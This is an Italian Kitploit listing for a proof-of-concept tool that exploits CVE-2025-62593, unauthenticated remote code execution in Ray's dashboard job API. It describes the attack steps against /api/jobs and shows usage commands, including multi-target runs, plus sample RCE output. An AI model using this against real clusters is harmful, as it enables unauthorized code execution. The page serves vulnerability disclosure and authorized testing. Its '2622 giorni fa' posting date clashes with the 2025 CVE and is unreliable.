Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-62593-PoC — PoC per CVE-2025-62593: RCE non autenticata in Ray (CISA KEV). Python solo stdlib. | Kitploit
Strumenti/GitHubGitHub/boreas37/cve-2025-62593-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza dell'IA
GitHubboreas37/cve-2025-62593-poc

CVE-2025-62593-PoC

PoC per CVE-2025-62593: RCE non autenticata in Ray (CISA KEV). Python solo stdlib.

Vedi Repository
2622 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-62593 — Esecuzione di codice remoto in Ray (non autenticata)

Proof-of-concept per CVE-2025-62593, una vulnerabilità di esecuzione di codice remoto non autenticata nel motore di calcolo AI distribuito Ray, sfruttata tramite attacchi di DNS-rebinding basati su browser. È stata aggiunta al catalogo CISA Known Exploited Vulnerabilities (KEV) ed è attivamente sfruttata.

La causa principale è una decisione progettuale di lunga data del team di Ray di non eseguire alcuna autenticazione sugli endpoint HTTP critici come /api/jobs e /api/job_agent/jobs. Per questo motivo, un attaccante remoto non autenticato può inviare un Ray Job il cui entrypoint è un comando arbitrario, che viene poi eseguito sul nodo head del cluster — piena esecuzione di codice remoto.

Questo PoC interagisce direttamente con l'API HTTP del Ray Dashboard (non è necessario alcun browser/DNS-rebinding per dimostrare il bug sottostante) e recupera l'output del comando dai log del job.

Impatto

  • CVSS: Critico (9.8)
  • Interessati: Ray < 2.52.0 (patch rilasciata per questo advisory)
  • CISA KEV: Sì — sfruttamento attivo, termine di remediation imposto
  • Espone i ~200k+ cluster Ray AI raggiungibili pubblicamente a RCE pre-autenticazione

Cosa fa

  1. POST /api/jobs/ con un entrypoint che esegue il tuo comando e cattura il suo stdout/stderr in un file temporaneo, poi stampa di nuovo il file.
  2. Controlla GET /api/jobs/ finché il job non raggiunge uno stato terminale.
  3. Legge GET /api/jobs/<submission_id>/logs e stampa l'output del comando.

Utilizzo

root@kitploit:~
# Single target
python3 ray_rce_poc.py --target http://HOST:8265

# Custom command
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"

# Multiple targets from a file (one per line, '#' = comment)
python3 ray_rce_poc.py --targets targets.txt --command id

# Write a JSON summary
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json

# Help
python3 ray_rce_poc.py --help

Richiede solo la stdlib di Python 3 — nessuna dipendenza di terze parti.

Esempio (verificato su un lab Docker locale)

root@kitploit:~
$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)

Riferimenti

  • Catalogo CISA KEV
  • GitHub Security Advisory GHSA-q279-jhrf-cc6v

Dichiarazione di non responsabilità

Solo per ricerca sulla sicurezza e test autorizzati. Utilizzalo esclusivamente contro sistemi di tua proprietà o per i quali hai esplicito permesso di testare. L'autore non è responsabile per un uso improprio.

Scarica lo strumento